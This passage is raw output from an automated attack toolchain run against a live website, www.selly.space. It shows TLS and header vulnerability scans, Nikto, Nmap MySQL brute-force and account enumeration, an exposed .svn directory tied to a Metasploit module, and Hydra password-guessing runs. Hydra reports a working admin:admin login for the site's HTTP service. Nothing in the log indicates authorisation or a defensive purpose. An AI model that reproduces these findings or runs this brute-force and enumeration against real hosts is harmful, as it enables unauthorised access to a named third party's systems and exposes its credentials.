726 SHA256 38A5326BE73524540E96E7EC3754948E26E93E330199E628F0233A8172A619C4
727 Common Name (CN) selly.space (CN in response to request w/o SNI: if1.us)
728 subjectAltName (SAN) mail.selly.space selly.space www.selly.space
729 Issuer Let's Encrypt Authority X3 (Let's Encrypt from US)
730 Trust (hostname) Ok via SAN (same w/o SNI)
731 Chain of trust Ok
732 EV cert (experimental) no
733 Certificate Expiration 89 >= 30 days (2017-10-23 13:22 --> 2018-01-21 12:22 -0700)
734 # of certificates provided 2
735 Certificate Revocation List --
736 OCSP URI http://ocsp.int-x3.letsencrypt.org
737 OCSP stapling offered
738 OCSP must staple no
739 DNS CAA RR (experimental) --
740 Certificate Transparency no
741
742
743 Testing HTTP header response @ "/"
744
745 HTTP Status Code 200 OK
746 HTTP clock skew 0 sec from localtime
747 Strict Transport Security --
748 Public Key Pinning --
749 Server banner LiteSpeed
750 Application banner X-Powered-By: PHP/5.6.31
751 Cookie(s) 1 issued: NOT secure, NOT HttpOnly
752 Security headers --
753 Reverse Proxy banner --
754
755
756 Testing vulnerabilities
757
758 Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
759 CCS (CVE-2014-0224) not vulnerable (OK)
760 Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session ticket extension
761 Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
762 Secure Client-Initiated Renegotiation not vulnerable (OK)
763 CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
764 BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
765 Can be ignored for static pages or if no secrets in the page
766 POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
767 TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
768 SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
769 FREAK (CVE-2015-0204) not vulnerable (OK)
770 DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
771 make sure you don't use this certificate elsewhere with SSLv2 enabled services
772 https://censys.io/ipv4?q=38A5326BE73524540E96E7EC3754948E26E93E330199E628F0233A8172A619C4 could help you to find out
773 LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
774 BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
775 ECDHE-RSA-AES256-SHA
776 AES128-SHA AES256-SHA
777 DES-CBC3-SHA
778 VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
779 LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
780 RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
781
782
783 Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
784
785Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
786-----------------------------------------------------------------------------------------------------------------------------
787 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
788 xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
789 xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
790 xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH 256 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
791 x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
792 x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
793 x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
794 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
795 xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
796 xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
797 x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
798 x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
799 x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
800 x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
801
802
803 Running client simulations via sockets
804
805 Android 2.3.7 TLSv1.0 AES128-SHA
806 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
807 Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
808 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
809 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
810 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
811 Android 7.0 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
812 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
813 Chrome 57 Win 7 No connection
814 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
815 Firefox 53 Win 7 No connection
816 IE 6 XP No connection
817 IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
818 IE 8 XP TLSv1.0 DES-CBC3-SHA
819 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
820 IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
821 IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
822 IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
823 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
824 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
825 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
826 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
827 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
828 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
829 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
830 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
831 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
832 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
833 Java 6u45 TLSv1.0 AES128-SHA
834 Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
835 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
836 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
837 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
838
839 Done 2017-10-23 15:35:30 [ 391s] -->> 45.34.7.20:443 (www.selly.space) <<--
840
841+ -- --=[Checking for DROWN (SSLv2): 45.34.7.20:443
842+ -- --=[Checking for HeartBleed: 45.34.7.20:443
843+ -- --=[Checking for OpenSSL CCS: 45.34.7.20:443
844+ -- --=[Checking for Poodle (SSLv3): 45.34.7.20:443
845+ -- --=[Checking for WinShock (MS14-066): 45.34.7.20:443
846Testing if OpenSSL supports the ciphers we are checking for: YES
847
848Testing 45.34.7.20:443 for availability of SSL ciphers added in MS14-066...
849Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
850Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
851Testing cipher AES256-GCM-SHA384: SUPPORTED
852Testing cipher AES128-GCM-SHA256: SUPPORTED
853Testing if IIS is running on port 443: NO
854Checking if target system is running Windows Server 2012 or later...
855Testing cipher ECDHE-RSA-AES256-SHA384: SUPPORTED
85645.34.7.20:443 is patched: UNKNOWN: Windows Server 2012 or later detected.
857+ -- --=[Scan Complete!
858 + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
859+ -- --=[Checking if X-Content options are enabled on www.selly.space...
860
861+ -- --=[Checking if X-Frame options are enabled on www.selly.space...
862
863+ -- --=[Checking if X-XSS-Protection header is enabled on www.selly.space...
864
865+ -- --=[Checking HTTP methods on www.selly.space...
866
867+ -- --=[Checking if TRACE method is enabled on www.selly.space...
868
869+ -- --=[Checking for META tags on www.selly.space...
870
871+ -- --=[Checking for open proxy on www.selly.space...
872
873+ -- --=[Enumerating software on www.selly.space...
874x-powered-by: PHP/5.6.31
875set-cookie: PHPSESSID=q10p1prho9li0utjmr29gq5as5; path=/
876server: LiteSpeed
877
878+ -- --=[Checking if Strict-Transport-Security is enabled on www.selly.space...
879
880+ -- --=[Checking for Flash cross-domain policy on www.selly.space...
881<head><title> 404 Not Found
882</title></head>
883<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
884<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
885 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
886<h2 style="margin-top:20px;font-size: 30px;">Not Found
887</h2>
888<p>The resource requested could not be found on this server!</p>
889</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
890<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
891
892+ -- --=[Checking for Silverlight cross-domain policy on www.selly.space...
893<head><title> 404 Not Found
894</title></head>
895<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
896<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
897 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
898<h2 style="margin-top:20px;font-size: 30px;">Not Found
899</h2>
900<p>The resource requested could not be found on this server!</p>
901</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
902<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
903
904+ -- --=[Checking for HTML5 cross-origin resource sharing on www.selly.space...
905
906+ -- --=[Retrieving robots.txt on www.selly.space...
907User-agent: *
908Crawl-Delay: 20
909
910+ -- --=[Retrieving sitemap.xml on www.selly.space...
911<head><title> 404 Not Found
912</title></head>
913<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
914<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
915 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
916<h2 style="margin-top:20px;font-size: 30px;">Not Found
917</h2>
918<p>The resource requested could not be found on this server!</p>
919</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
920<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
921
922+ -- --=[Checking cookie attributes on www.selly.space...
923set-cookie: PHPSESSID=p185n675gi50t5hkju1nj2pue1; path=/
924
925+ -- --=[Checking for ASP.NET Detailed Errors on www.selly.space...
926<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
927<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
928
929
930 + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
931- Nikto v2.1.6
932---------------------------------------------------------------------------
933+ Target IP: 45.34.7.20
934+ Target Hostname: www.selly.space
935+ Target Port: 443
936---------------------------------------------------------------------------
937+ SSL Info: Subject: /CN=selly.space
938 Ciphers: ECDHE-RSA-CHACHA20-POLY1305
939 Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
940+ Start Time: 2017-10-23 15:35:53 (GMT-6)
941---------------------------------------------------------------------------
942+ Server: LiteSpeed
943+ Retrieved x-powered-by header: PHP/5.6.31
944+ The anti-clickjacking X-Frame-Options header is not present.
945+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
946+ Uncommon header 'alt-svc' found, with contents: quic=":443"; ma=2592000; v="35,37,38,39"
947+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
948+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
949+ Cookie PHPSESSID created without the secure flag
950+ Cookie PHPSESSID created without the httponly flag
951+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
952+ Hostname 'www.selly.space' does not match certificate's names: selly.space
953+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: at /var/lib/nikto/plugins/LW2.pm line 5157.
954 at /var/lib/nikto/plugins/LW2.pm line 5157.
955; Connection reset by peer at /var/lib/nikto/plugins/LW2.pm line 5157.
956: Connection reset by peer
957+ Scan terminated: 20 error(s) and 10 item(s) reported on remote host
958+ End Time: 2017-10-23 15:38:18 (GMT-6) (145 seconds)
959---------------------------------------------------------------------------
960+ 1 host(s) tested
961 + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
962[+] Screenshot saved to /usr/share/sniper/loot/screenshots/www.selly.space-port443.jpg
963 + -- --=[Port 445 closed... skipping.
964 + -- --=[Port 512 closed... skipping.
965 + -- --=[Port 513 closed... skipping.
966 + -- --=[Port 514 closed... skipping.
967 + -- --=[Port 623 closed... skipping.
968 + -- --=[Port 624 closed... skipping.
969 + -- --=[Port 1099 closed... skipping.
970 + -- --=[Port 1433 closed... skipping.
971 + -- --=[Port 2049 closed... skipping.
972 + -- --=[Port 2121 closed... skipping.
973 + -- --=[Port 3306 opened... running tests...
974
975Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:39 MDT
976Stats: 0:05:43 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
977NSE Timing: About 76.60% done; ETC: 15:47 (0:01:42 remaining)
978Stats: 0:07:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
979NSE Timing: About 76.60% done; ETC: 15:50 (0:02:21 remaining)
980Nmap scan report for www.selly.space (45.34.7.20)
981Host is up (0.041s latency).
982rDNS record for 45.34.7.20: dal.if1.us
983
984PORT STATE SERVICE VERSION
9853306/tcp open mysql MySQL 5.5.5-10.1.24-MariaDB-cll-lve
986| mysql-brute:
987| Accounts: No valid accounts found
988|_ Statistics: Performed 31086 guesses in 600 seconds, average tps: 53.1
989| mysql-enum:
990| Valid usernames:
991| root:<empty> - Valid credentials
992| netadmin:<empty> - Valid credentials
993| guest:<empty> - Valid credentials
994| user:<empty> - Valid credentials
995| test:<empty> - Valid credentials
996| sysadmin:<empty> - Valid credentials
997| administrator:<empty> - Valid credentials
998| webadmin:<empty> - Valid credentials
999| admin:<empty> - Valid credentials
1000| web:<empty> - Valid credentials
1001|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
1002| mysql-info:
1003| Protocol: 10
1004| Version: 5.5.5-10.1.24-MariaDB-cll-lve
1005| Thread ID: 2922259
1006| Capabilities flags: 63487
1007| Some Capabilities: IgnoreSigpipes, ConnectWithDatabase, InteractiveClient, DontAllowDatabaseTableColumn, SupportsTransactions, LongPassword, LongColumnFlag, Speaks41ProtocolOld, Support41Auth, Speaks41ProtocolNew, FoundRows, ODBCClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
1008| Status: Autocommit
1009| Salt: &Zvcmy;Uz(VX7G@L>0u"
1010|_ Auth Plugin Name: 102
1011Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1012Device type: bridge|general purpose
1013Running (JUST GUESSING): Oracle Virtualbox (98%), QEMU (93%)
1014OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
1015Aggressive OS guesses: Oracle Virtualbox (98%), QEMU user mode network gateway (93%)
1016No exact OS matches for host (test conditions non-ideal).
1017Network Distance: 2 hops
1018
1019TRACEROUTE (using port 3306/tcp)
1020HOP RTT ADDRESS
10211 2.93 ms 10.0.2.2
10222 70.43 ms dal.if1.us (45.34.7.20)
1023
1024OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1025Nmap done: 1 IP address (1 host up) scanned in 608.18 seconds
1026ERROR 1045 (28000): Access denied for user 'root'@'c-71-205-227-64.hsd1.co.comcast.net' (using password: NO)
1027 + -- --=[Port 3310 closed... skipping.
1028 + -- --=[Port 3128 closed... skipping.
1029 + -- --=[Port 3389 closed... skipping.
1030 + -- --=[Port 3632 closed... skipping.
1031 + -- --=[Port 4443 closed... skipping.
1032 + -- --=[Port 5432 closed... skipping.
1033 + -- --=[Port 5800 closed... skipping.
1034 + -- --=[Port 5900 closed... skipping.
1035 + -- --=[Port 5984 closed... skipping.
1036 + -- --=[Port 6000 closed... skipping.
1037 + -- --=[Port 6667 closed... skipping.
1038 + -- --=[Port 8000 closed... skipping.
1039 + -- --=[Port 8100 closed... skipping.
1040 + -- --=[Port 8080 closed... skipping.
1041 + -- --=[Port 8180 closed... skipping.
1042 + -- --=[Port 8443 closed... skipping.
1043 + -- --=[Port 8888 closed... skipping.
1044 + -- --=[Port 10000 closed... skipping.
1045 + -- --=[Port 16992 closed... skipping.
1046 + -- --=[Port 27017 closed... skipping.
1047 + -- --=[Port 27018 closed... skipping.
1048 + -- --=[Port 27019 closed... skipping.
1049 + -- --=[Port 28017 closed... skipping.
1050 + -- --=[Port 49152 closed... skipping.
1051 + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
1052################################################################################
1053[2017-10-23T15:50:01.010233 #15316] INFO -- : Initiating port scan
1054I, [2017-10-23T15:54:54.994359 #15316] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-23_15-50-01.xml
1055I, [2017-10-23T15:54:55.006868 #15316] INFO -- : Discovered open port: 45.34.7.20:80
1056I, [2017-10-23T15:54:55.206393 #15316] INFO -- : Discovered open port: 45.34.7.20:443
1057I, [2017-10-23T15:54:55.538832 #15316] INFO -- : Discovered open port: 45.34.7.20:465
1058I, [2017-10-23T15:54:55.891170 #15316] INFO -- : Discovered open port: 45.34.7.20:993
1059I, [2017-10-23T15:54:56.358545 #15316] INFO -- : Discovered open port: 45.34.7.20:995
1060I, [2017-10-23T15:54:56.836232 #15316] INFO -- : Discovered open port: 45.34.7.20:5960
1061I, [2017-10-23T15:54:57.604691 #15316] INFO -- : <<<Enumerating vulnerable applications>>>
1062
1063
1064--------------------------------------------------------
1065<<<Yasuo discovered following vulnerable applications>>>
1066--------------------------------------------------------
1067+----------+----------------------------+----------------------------------------------+----------+----------+
1068| App Name | URL to Application | Potential Exploit | Username | Password |
1069+----------+----------------------------+----------------------------------------------+----------+----------+
1070| SVN | http://45.34.7.20:80/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | | |
1071+----------+----------------------------+----------------------------------------------+----------+----------+
1072 + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
1073 + -- ----------------------------=[Running Brute Force]=------Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:55 MDT
1074Nmap scan report for www.selly.space (45.34.7.20)
1075Host is up (0.82s latency).
1076rDNS record for 45.34.7.20: dal.if1.us
1077Not shown: 12 filtered ports, 7 closed ports
1078Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1079PORT STATE SERVICE
108021/tcp open ftp
108153/tcp open domain
108280/tcp open http
1083110/tcp open pop3
1084443/tcp open https
1085993/tcp open imaps
10863306/tcp open mysql
1087
1088Nmap done: 1 IP address (1 host up) scanned in 4.03 seconds
1089
1090################################### Running Brute Force ############################
1091
1092 + -- --=[Port 21 opened... running tests...
1093Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1094
1095Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-23 15:55:39
1096[DATA] max 1 task per 1 server, overall 1 tasks, 30 login tries, ~30 tries per task
1097[DATA] attacking ftp://www.selly.space:21/
1098[STATUS] 8.00 tries/min, 8 tries in 00:01h, 22 to do in 00:03h, 1 active
1099[STATUS] 7.00 tries/min, 14 tries in 00:02h, 16 to do in 00:03h, 1 active
1100[STATUS] 6.67 tries/min, 20 tries in 00:03h, 10 to do in 00:02h, 1 active
11011 of 1 target completed, 0 valid passwords found
1102Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-23 15:58:53
1103 + -- --=[Port 22 closed... skipping.
1104 + -- --=[Port 23 closed... skipping.
1105 + -- --=[Port 25 closed... skipping.
1106 + -- --=[Port 80 opened... running tests...
1107Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1108
1109Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-23 15:58:53
1110[DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
1111[DATA] attacking http-get://www.selly.space:80//
1112[80][http-get] host: www.selly.space login: admin password: admin
1113[STATUS] attack finished for www.selly.space (valid pair found)
11141 of 1 target successfully completed, 1 valid password found
1115Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-23 15:58:56
1116 + -- --=[Port 110 opened... running tests...
1117Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1118
1119Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-23 15:58:56
1120[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
1121[DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
1122[DATA] attacking pop3://www.selly.space:110/
1123[STATUS] 6.00 tries/min, 6 tries in 00:01h, 1490 to do in 04:09h, 1 active
1124[STATUS] 4.00 tries/min, 12 tries in 00:03h, 1484 to do in 06:12h, 1 active
1125[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1126
1127[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1128
1129[STATUS] 4.14 tries/min, 29 tries in 00:07h, 1467 to do in 05:55h, 1 active
1130[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1131
1132[STATUS] 4.00 tries/min, 48 tries in 00:12h, 1448 to do in 06:03h, 1 active
1133[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1134
1135[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1136
1137
1138[STATUS] 3.88 tries/min, 66 tries in 00:17h, 1430 to do in 06:09h, 1 active
1139[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1140
1141[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1142
1143[STATUS] 3.95 tries/min, 87 tries in 00:22h, 1409 to do in 05:57h, 1 active
1144
1145[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1146
1147
1148
1149[STATUS] 3.89 tries/min, 105 tries in 00:27h, 1391 to do in 05:58h, 1 active
1150[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1151
1152[STATUS] 3.81 tries/min, 122 tries in 00:32h, 1374 to do in 06:01h, 1 active
1153[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1154
1155[STATUS] 3.76 tries/min, 139 tries in 00:37h, 1357 to do in 06:02h, 1 active
1156[STATUS] 3.76 tries/min, 158 tries in 00:42h, 1338 to do in 05:56h, 1 active
1157[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1158
1159
1160[STATUS] 3.64 tries/min, 176 tries in 00:48h, 1320 to do in 06:04h, 1 active
1161[ERROR] POP3 LOGIN AUTH : -ERR Disconnected for inactivity during authentication.
1162
1163^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
1164 + -- --=[Port 139 closed... skipping.
1165 + -- --=[Port 162 closed... skipping.
1166 + -- --=[Port 389 closed... skipping.
1167 + -- --=[Port 443 opened... running tests...
1168Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1169
1170Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-23 16:47:52
1171[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
1172[DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
1173[DATA] attacking http-gets://www.selly.space:443//
1174[443][http-get] host: www.selly.space login: admin password: admin
1175[STATUS] attack finished for www.selly.space (valid pair found)
11761 of 1 target successfully completed, 1 valid password found
1177Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-23 16:48:05
1178 + -- --=[Port 445 closed... skipping.
1179 + -- --=[Port 512 closed... skipping.
1180 + -- --=[Port 513 closed... skipping.
1181 + -- --=[Port 514 closed... skipping.
1182 + -- --=[Port 993 opened... running tests...
1183Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.